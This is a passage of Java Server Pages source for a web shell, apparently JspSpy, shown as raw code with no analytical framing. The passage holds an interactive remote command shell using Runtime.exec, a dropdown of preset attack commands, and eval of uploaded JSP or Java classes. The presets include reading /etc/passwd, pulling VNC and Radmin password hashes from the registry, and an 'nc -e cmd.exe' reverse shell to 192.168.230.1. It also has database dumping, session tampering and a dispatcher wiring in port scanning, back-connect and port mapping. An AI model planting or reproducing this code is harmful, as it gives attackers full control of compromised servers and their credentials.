3670. + " <select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"
3671. + " <option value=\"\" selected> </option>"
3672. + " <option value=\"uname -a\">uname -a</option>"
3673. + " <option value=\"cat /etc/issue\">issue</option>"
3674. + " <option value=\"cat /etc/passwd\">passwd</option>"
3675. + " <option value=\"netstat -an\">netstat -an</option>"
3676. + " <option value=\"net user\">net user</option>"
3677. + " <option value=\"tasklist\">tasklist</option>"
3678. + " <option value=\"tasklist /svc\">tasklist /svc</option>"
3679. + " <option value=\"net start\">net start</option>"
3680. + " <option value=\"net stop policyagent /yes\">net stop</option>"
3681. + " <option value=\"nbtstat -A IP\">nbtstat -A</option>"
3682. + " <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"
3683. + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"
3684. + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"
3685. + " <option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"
3686. + " <option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"
3687. + " <option value=\"systeminfo\">systeminfo</option>"
3688. + " <option value=\"net localgroup\">view groups</option>"
3689. + " <option value=\"net localgroup administrators\">view admins</option>"
3690. + " </select>"
3691. + " <input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"
3692. + " <input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"
3693. + " </form>"
3694. + " <iframe style=\"display:none\" name=\"asyn\"></iframe>");
3695. out.println(" </td>" + " </tr>" + "</table>");
3696. } catch (Exception e) {
3697. throw e;
3698. }
3699. }
3700. }
3701.  
3702. private static class OnLineInvoker extends DefaultInvoker {
3703. public boolean doBefore() {
3704. return false;
3705. }
3706.  
3707. public boolean doAfter() {
3708. return false;
3709. }
3710.  
3711. public void invoke(HttpServletRequest request,
3712. HttpServletResponse response, HttpSession JSession)
3713. throws Exception {
3714. try {
3715. String type = request.getParameter("type");
3716. if (Util.isEmpty(type))
3717. return;
3718. if (type.toLowerCase().equals("start")) {
3719. String exe = request.getParameter("exe");
3720. if (Util.isEmpty(exe))
3721. return;
3722. Process pro = Runtime.getRuntime().exec(exe);
3723. ByteArrayOutputStream outs = new ByteArrayOutputStream();
3724. response.setContentLength(100000000);
3725. response.setContentType("text/html;charset="
3726. + System.getProperty("file.encoding"));
3727. OnLineProcess olp = new OnLineProcess(pro);
3728. JSession.setAttribute(SHELL_ONLINE, olp);
3729. new OnLineConnector(new ByteArrayInputStream(outs
3730. .toByteArray()), pro.getOutputStream(),
3731. "exeOclientR", olp).start();
3732. new OnLineConnector(pro.getInputStream(), response
3733. .getOutputStream(), "exeRclientO", olp).start();
3734. new OnLineConnector(pro.getErrorStream(), response
3735. .getOutputStream(), "exeRclientO", olp).start();
3736. Thread.sleep(1000 * 60 * 60 * 24);
3737. } else if (type.equals("ecmd")) {
3738. Object o = JSession.getAttribute(SHELL_ONLINE);
3739. String cmd = request.getParameter("cmd");
3740. if (Util.isEmpty(cmd))
3741. return;
3742. if (o == null)
3743. return;
3744. OnLineProcess olp = (OnLineProcess) o;
3745. olp.setCmd(cmd);
3746. } else {
3747. Object o = JSession.getAttribute(SHELL_ONLINE);
3748. if (o == null)
3749. return;
3750. OnLineProcess olp = (OnLineProcess) o;
3751. olp.stop();
3752. }
3753. } catch (Exception e) {
3754.  
3755. throw e;
3756. }
3757. }
3758. }
3759.  
3760. private static class EnterInvoker extends DefaultInvoker {
3761. public boolean doBefore() {
3762. return false;
3763. }
3764.  
3765. public boolean doAfter() {
3766. return false;
3767. }
3768.  
3769. public void invoke(HttpServletRequest request,
3770. HttpServletResponse response, HttpSession JSession)
3771. throws Exception {
3772. PrintWriter out = response.getWriter();
3773. String type = request.getParameter("type");
3774. if (!Util.isEmpty(type)) {
3775. JSession.removeAttribute(ENTER);
3776. JSession.removeAttribute(ENTER_MSG);
3777. JSession.removeAttribute(ENTER_CURRENT_DIR);
3778. JSession.setAttribute(MSG, "Exit File Success ! ");
3779. } else {
3780. String f = request.getParameter("filepath");
3781. if (Util.isEmpty(f))
3782. return;
3783. JSession.setAttribute(ENTER, f);
3784. JSession
3785. .setAttribute(
3786. ENTER_MSG,
3787. "You Are In File <a style='color:red'>\""
3788. + f
3789. + "\"</a> Now ! <a href=\"javascript:doPost({o:'enter',type:'exit'})\"> Exit </a>");
3790. }
3791. response.sendRedirect(SHELL_NAME);
3792. }
3793. }
3794.  
3795. private static class VExport2FileInvoker extends DefaultInvoker {
3796. public void invoke(HttpServletRequest request,
3797. HttpServletResponse response, HttpSession JSession)
3798. throws Exception {
3799. PrintWriter out = response.getWriter();
3800. String type = request.getParameter("type");
3801. String sql = request.getParameter("sql");
3802. String table = request.getParameter("table");
3803. if (Util.isEmpty(sql) && Util.isEmpty(table)) {
3804. JSession.setAttribute(SESSION_O, "vConn");
3805. response.sendRedirect(SHELL_NAME);
3806. return;
3807. }
3808. out
3809. .println("<form action=\"\" method=\"post\">"
3810. + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3811. + " <tr>"
3812. + " <td>"
3813. + " <input type=\"hidden\" name=\"o\" value=\"export\"/>"
3814. + " <input type=\"hidden\" name=\"type\" value=\""
3815. + (Util.isEmpty(type) ? "" : type)
3816. + "\"/>"
3817. + " <input type=\"hidden\" name=\"sql\" value=\""
3818. + (Util.isEmpty(sql) ? "" : sql.replaceAll("\"",
3819. "&quot;"))
3820. + "\"/>"
3821. + " <input type=\"hidden\" name=\"table\" value=\""
3822. + (Util.isEmpty(table) ? "" : table)
3823. + "\"/>"
3824. + " <h2>Export To File &raquo;</h2>"
3825. + " "
3826. + " <hr/>Export \"<span style='color:red;font-weight:bold'>"
3827. + (Util.isEmpty(sql) ? table : sql.replaceAll("\"",
3828. "&quot;"))
3829. + "</span>\" To File : <input type=\"text\" style=\"font-weight:bold\" name=\"filepath\" value=\""
3830. + (JSession.getAttribute(CURRENT_DIR).toString() + "/exportdata.txt")
3831. + "\" size=\"100\" class=\"input\"/>"
3832. + " <select name='encode' class='input'><option value=''>ANSI</option><option value='GBK'>GBK</option><option value='UTF-8'>UTF-8</option><option value='ISO-8859-1'>ISO-8859-1</option></select>"
3833. + " <input type=\"submit\" class=\"bt\" value=\"Export\"/><br/><br/>"
3834. + BACK_HREF
3835. + "</td>"
3836. + " </tr>"
3837. + " </table>" + "</form>");
3838. }
3839. }
3840.  
3841. private static class ExportInvoker extends DefaultInvoker {
3842. public boolean doBefore() {
3843. return false;
3844. }
3845.  
3846. public boolean doAfter() {
3847. return false;
3848. }
3849.  
3850. public void invoke(HttpServletRequest request,
3851. HttpServletResponse response, HttpSession JSession)
3852. throws Exception {
3853. String type = request.getParameter("type");
3854. String filepath = request.getParameter("filepath");
3855. String encode = request.getParameter("encode");
3856. String sql = null;
3857. DBOperator dbo = null;
3858. dbo = (DBOperator) JSession.getAttribute(DBO);
3859.  
3860. if (Util.isEmpty(type)) {
3861. //table export
3862. String tb = request.getParameter("table");
3863. if (Util.isEmpty(tb))
3864. return;
3865. String s = dbo.getConn().getMetaData()
3866. .getIdentifierQuoteString();
3867. sql = "select * from " + s + tb + s;
3868.  
3869. } else if (type.equals("queryexp")) {
3870. //query export
3871. sql = request.getParameter("sql");
3872. if (Util.isEmpty(sql)) {
3873. JSession.setAttribute(SESSION_O, "vConn");
3874. response.sendRedirect(SHELL_NAME);
3875. return;
3876. }
3877. }
3878. Object o = dbo.execute(sql);
3879. ByteArrayOutputStream bout = new ByteArrayOutputStream();
3880. byte[] rowSep = "\r\n".getBytes();
3881. if (o instanceof ResultSet) {
3882. ResultSet rs = (ResultSet) o;
3883. ResultSetMetaData meta = rs.getMetaData();
3884. int count = meta.getColumnCount();
3885. for (int i = 1; i <= count; i++) {
3886. String colName = meta.getColumnName(i) + "\t";
3887. byte[] b = null;
3888. if (Util.isEmpty(encode))
3889. b = colName.getBytes();
3890. else
3891. b = colName.getBytes(encode);
3892. bout.write(b, 0, b.length);
3893. }
3894. bout.write(rowSep, 0, rowSep.length);
3895. while (rs.next()) {
3896. for (int i = 1; i <= count; i++) {
3897. String v = null;
3898. try {
3899. v = rs.getString(i);
3900. } catch (SQLException ex) {
3901. v = "<<Error!>>";
3902. }
3903. v += "\t";
3904. byte[] b = null;
3905. if (Util.isEmpty(encode))
3906. b = v.getBytes();
3907. else
3908. b = v.getBytes(encode);
3909. bout.write(b, 0, b.length);
3910. }
3911. bout.write(rowSep, 0, rowSep.length);
3912. }
3913. rs.close();
3914. ByteArrayInputStream input = new ByteArrayInputStream(bout
3915. .toByteArray());
3916. BufferedOutputStream output = null;
3917. if (!Util.isEmpty(filepath)) {
3918. //export2file
3919. output = new BufferedOutputStream(new FileOutputStream(
3920. new File(filepath)));
3921. } else {
3922. //download.
3923. response.setHeader("Content-Disposition",
3924. "attachment;filename=DataExport.txt");
3925. output = new BufferedOutputStream(response
3926. .getOutputStream());
3927. }
3928. byte[] data = new byte[1024];
3929. int len = input.read(data);
3930. while (len != -1) {
3931. output.write(data, 0, len);
3932. len = input.read(data);
3933. }
3934. bout.close();
3935. input.close();
3936. output.close();
3937. if (!Util.isEmpty(filepath)) {
3938. JSession.setAttribute(MSG, "Export To File Success !");
3939. response.sendRedirect(SHELL_NAME);
3940. }
3941. }
3942. }
3943. }
3944.  
3945. private static class EvalInvoker extends DefaultInvoker {
3946. public void invoke(HttpServletRequest request,
3947. HttpServletResponse response, HttpSession JSession)
3948. throws Exception {
3949. String type = request.getParameter("type");
3950. PrintWriter out = response.getWriter();
3951. Object msg = JSession.getAttribute(MSG);
3952. if (msg != null) {
3953. Util.outMsg(out, (String) msg);
3954. JSession.removeAttribute(MSG);
3955. }
3956. if (Util.isEmpty(type)) {
3957. out
3958. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3959. + " <tr>"
3960. + " <td><h2>Eval Java Code &raquo;</h2>"
3961. + "<hr/>"
3962. + " <p>"
3963. + " <form action=\""
3964. + SHELL_NAME
3965. + "?o=eu\" method=\"post\" enctype=\"multipart/form-data\">"
3966. + "UpLoad a Class File : ");
3967. Util
3968. .outMsg(
3969. out,
3970. "<pre>"
3971. + "<span style='color:blue'>public class</span> SpyEval{\r\n"
3972. + " <span style='color:blue'>static</span> {\r\n"
3973. + " <span style='color:green'>//Your Code Here.</span>\r\n"
3974. + " }\r\n" + "}\r\n" + "</pre>", "left");
3975. out
3976. .println(" <input class=\"input\" name=\"file\" type=\"file\"/> <input type=\"submit\" class=\"bt\" value=\" Eval \"></form><hr/>"
3977. + " <form action=\""
3978. + SHELL_NAME
3979. + "\" method=\"post\"><p></p>Jsp Eval : <br/>"
3980. + " <input type=\"hidden\" name=\"o\" value=\"ev\"><input type=\"hidden\" name=\"type\" value=\"jsp\">"
3981. + " <textarea name=\"jspc\" rows=\"15\" cols=\"70\">"
3982. + URLDecoder
3983. .decode(
3984. "%3C%25%40page+pageEncoding%3D%22utf-8%22%25%3E%0D%0A%3C%25%0D%0A%2F%2Fyour+code+here.%0D%0Aout.println%28%22create+a+jsp+file+then+include+it+%21+by++ninty%22%29%3B%0D%0A%25%3E",
3985. "utf-8")
3986. + "</textarea>"
3987. + " <br/><input class=\"bt\" name=\"button\" id=\"button\" value=\"Eval\" type=\"submit\" size=\"100\" />"
3988. + " </form>"
3989. + " </p>"
3990. + " </td>"
3991. + " </tr>" + "</table>");
3992. } else if (type.equals("jsp")) {
3993. String jspc = request.getParameter("jspc");
3994. if (Util.isEmpty(jspc))
3995. return;
3996. File f = new File(SHELL_DIR, "evaltmpninty.jsp");
3997. BufferedWriter writer = new BufferedWriter(
3998. new OutputStreamWriter(new FileOutputStream(f), "utf-8"));
3999. writer.write(jspc, 0, jspc.length());
4000. writer.flush();
4001. writer.close();
4002. out
4003. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
4004. + " <tr>"
4005. + " <td><h2>Jsp Eval Result &raquo;</h2>");
4006. out
4007. .println("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:left;font-weight:bold;margin:10px\">");
4008. request.getRequestDispatcher("evaltmpninty.jsp").include(
4009. request, response);
4010. out
4011. .println("</div><input type=\"button\" value=\" Back \" class=\"bt\" onclick=\"history.back()\"></td></tr></table> ");
4012. f.delete();
4013. }
4014. }
4015. }
4016.  
4017. private static class EvalUploadInvoker extends DefaultInvoker {
4018. public void invoke(HttpServletRequest request,
4019. HttpServletResponse response, HttpSession JSession)
4020. throws Exception {
4021. ByteArrayOutputStream stream = new ByteArrayOutputStream();
4022. UploadBean upload = new UploadBean();
4023. upload.setTargetOutput(stream);
4024. upload.parseRequest(request);
4025.  
4026. if (stream.toByteArray().length == 2) {
4027. JSession.setAttribute(MSG, "Please Upload Your Class File ! ");
4028. ((Invoker) ins.get("ev")).invoke(request, response, JSession);
4029. return;
4030. }
4031. SpyClassLoader loader = new SpyClassLoader();
4032. try {
4033. Class c = loader.defineClass(null, stream.toByteArray());
4034. c.newInstance();
4035. } catch (Exception e) {
4036. }
4037. stream.close();
4038. JSession.setAttribute(MSG, "Eval Java Class Done ! ");
4039. ((Invoker) ins.get("ev")).invoke(request, response, JSession);
4040. }
4041. }
4042.  
4043. private static class VOtherInvoker extends DefaultInvoker {
4044. public void invoke(HttpServletRequest request,
4045. HttpServletResponse response, HttpSession JSession)
4046. throws Exception {
4047. try {
4048. PrintWriter out = response.getWriter();
4049. Object msg = JSession.getAttribute(MSG);
4050. if (msg != null) {
4051. Util.outMsg(out, (String) msg);
4052. JSession.removeAttribute(MSG);
4053. }
4054. out
4055. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
4056. + " <tr>"
4057. + " <td><h2 id=\"Bin_H2_Title\">Session Manager&gt;&gt;</h2><hr/>"
4058. + " <div id=\"hOWTm\" style=\"line-height:30px\">"
4059. + " <ul>");
4060. Enumeration en = JSession.getAttributeNames();
4061. while (en.hasMoreElements()) {
4062. Object o = en.nextElement();
4063. if (o.toString().equals(MSG))
4064. continue;
4065. out
4066. .println("<li><form action='"
4067. + SHELL_NAME
4068. + "' method='post'><u>"
4069. + o.toString()
4070. + "</u> <input type=\"text\" name=\"value\" class=\"input\" size=\"50\" value=\""
4071. + JSession.getAttribute(o.toString())
4072. + "\">");
4073. out
4074. .println("<input type='button' class='bt' value='Update' onclick=\"this.form.elements['type'].value='update';this.form.submit()\"> <input type='button' onclick=\"this.form.elements['type'].value='delete';this.form.submit()\" class='bt' value='Delete'/>");
4075. out
4076. .println("<input type='hidden' name='o' value='sm'/><input type='hidden' name='type'/>");
4077. out.println("<input type='hidden' name='name' value='"
4078. + o.toString() + "'/>");
4079. out.println("</form></li>");
4080. }
4081. out
4082. .println("<li style='list-style:none'><form action='"
4083. + SHELL_NAME
4084. + "' method='post'><fieldset>"
4085. + "<legend>New Session Attribute</legend>"
4086. + "name : <input type=\"text\" name=\"name\" value=\"\" class=\"input\"> value : <input type=\"text\""
4087. + " name=\"value\" class=\"input\"/> <input type='submit' value='Add' class='bt'><input type='hidden' name='o' value='sm'/><input type='hidden' name='type' value='update'>"
4088. + " </fieldset></form></li></ul></div></td>"
4089. + " </tr>" + " </table>");
4090. } catch (Exception e) {
4091. throw e;
4092. }
4093. }
4094. }
4095.  
4096. //Session Manager
4097. private static class SmInvoker extends DefaultInvoker {
4098. public void invoke(HttpServletRequest request,
4099. HttpServletResponse response, HttpSession JSession)
4100. throws Exception {
4101. try {
4102. String type = request.getParameter("type");
4103. PrintWriter out = response.getWriter();
4104. if (type.equals("update")) {
4105. String name = request.getParameter("name");
4106. String value = request.getParameter("value");
4107. JSession.setAttribute(name, value);
4108. JSession
4109. .setAttribute(MSG, "Update/Add Attribute Success !");
4110. } else if (type.equals("delete")) {
4111. String name = request.getParameter("name");
4112. JSession.removeAttribute(name);
4113. JSession.setAttribute(MSG, "Remove Attribute Success !");
4114. }
4115. ((Invoker) ins.get("vother")).invoke(request, response,
4116. JSession);
4117. } catch (Exception e) {
4118.  
4119. throw e;
4120. }
4121. }
4122. }
4123.  
4124. static {
4125. ins.put("script", new ScriptInvoker());
4126. ins.put("before", new BeforeInvoker());
4127. ins.put("after", new AfterInvoker());
4128. ins.put("deleteBatch", new DeleteBatchInvoker());
4129. ins.put("clipboard", new ClipBoardInvoker());
4130. ins.put("vPortScan", new VPortScanInvoker());
4131. ins.put("portScan", new PortScanInvoker());
4132. ins.put("vConn", new VConnInvoker());
4133. ins.put("dbc", new DbcInvoker());
4134. ins.put("executesql", new ExecuteSQLInvoker());
4135. ins.put("vLogin", new VLoginInvoker());
4136. ins.put("login", new LoginInvoker());
4137. ins.put("filelist", new FileListInvoker());
4138. ins.put("logout", new LogoutInvoker());
4139. ins.put("upload", new UploadInvoker());
4140. ins.put("copy", new CopyInvoker());
4141. ins.put("bottom", new BottomInvoker());
4142. ins.put("vCreateFile", new VCreateFileInvoker());
4143. ins.put("vEdit", new VEditInvoker());
4144. ins.put("createFile", new CreateFileInvoker());
4145. ins.put("vEditProperty", new VEditPropertyInvoker());
4146. ins.put("editProperty", new EditPropertyInvoker());
4147. ins.put("vs", new VsInvoker());
4148. ins.put("shell", new ShellInvoker());
4149. ins.put("down", new DownInvoker());
4150. ins.put("vd", new VdInvoker());
4151. ins.put("downRemote", new DownRemoteInvoker());
4152. ins.put("index", new IndexInvoker());
4153. ins.put("mkdir", new MkDirInvoker());
4154. ins.put("move", new MoveInvoker());
4155. ins.put("removedir", new RemoveDirInvoker());
4156. ins.put("packBatch", new PackBatchInvoker());
4157. ins.put("pack", new PackInvoker());
4158. ins.put("unpack", new UnPackInvoker());
4159. ins.put("vmp", new VmpInvoker());
4160. ins.put("vbc", new VbcInvoker());
4161. ins.put("backConnect", new BackConnectInvoker());
4162. ins.put("jspEnv", new JspEnvInvoker());
4163. ins.put("smp", new SmpInvoker());
4164. ins.put("mapPort", new MapPortInvoker());
4165. ins.put("top", new TopInvoker());
4166. ins.put("vso", new VOnLineShellInvoker());
4167. ins.put("online", new OnLineInvoker());
4168. ins.put("enter", new EnterInvoker());
4169. ins.put("export", new ExportInvoker());
4170. ins.put("ev", new EvalInvoker());
4171. ins.put("eu", new EvalUploadInvoker());
4172. ins.put("vother", new VOtherInvoker());
4173. ins.put("sm", new SmInvoker());
4174. ins.put("vExport", new VExport2FileInvoker());
4175. ins.put("vPack", new VPackConfigInvoker());
4176. ins.put("reflect", new ReflectInvoker());
4177. ins.put("portBack", new PortBackInvoker());
4178. }%>
4179. <%
4180. try {
4181. String o = request.getParameter("o");
4182. if (Util.isEmpty(o)) {
4183. if (session.getAttribute(SESSION_O) == null)
4184. o = "index";
4185. else {
4186. o = session.getAttribute(SESSION_O).toString();
4187. session.removeAttribute(SESSION_O);
4188. }
4189. }
4190. Object obj = ins.get(o);
4191. if (obj == null) {
4192. response.sendRedirect(SHELL_NAME);
4193. } else {
4194. Invoker in = (Invoker) obj;
4195. if (in.doBefore()) {
4196. String path = request.getParameter("folder");
4197. if (!Util.isEmpty(path)
4198. && session.getAttribute(ENTER) == null)
4199. session.setAttribute(CURRENT_DIR, path);
4200. ((Invoker) ins.get("before")).invoke(request, response,
4201. session);
4202. ((Invoker) ins.get("script")).invoke(request, response,
4203. session);
4204. ((Invoker) ins.get("top")).invoke(request, response,
4205. session);
4206. }
4207. in.invoke(request, response, session);
4208. if (!in.doAfter()) {
4209. return;
4210. } else {
4211. ((Invoker) ins.get("bottom")).invoke(request, response,
4212. session);
4213. ((Invoker) ins.get("after")).invoke(request, response,
4214. session);
4215. }
4216. }
4217. } catch (Exception e) {
4218. Object msg = session.getAttribute(MSG);
4219. if (msg != null) {
4220. Util.outMsg(out, (String) msg);
4221. session.removeAttribute(MSG);
4222. }
4223. if (e.toString().indexOf("ClassCastException") != -1) {
4224. Util.outMsg(out, MODIFIED_ERROR + BACK_HREF);
4225. }
4226. ByteArrayOutputStream bout = new ByteArrayOutputStream();
4227. e.printStackTrace(new PrintStream(bout));
4228. session.setAttribute(CURRENT_DIR, SHELL_DIR);
4229. Util.outMsg(out, Util
4230. .htmlEncode(new String(bout.toByteArray())).replaceAll(
4231. "\n", "<br/>"), "left");
4232. bout.close();
4233. out.flush();
4234. ((Invoker) ins.get("bottom"))
4235. .invoke(request, response, session);
4236. ((Invoker) ins.get("after")).invoke(request, response, session);
4237. }
4238. %>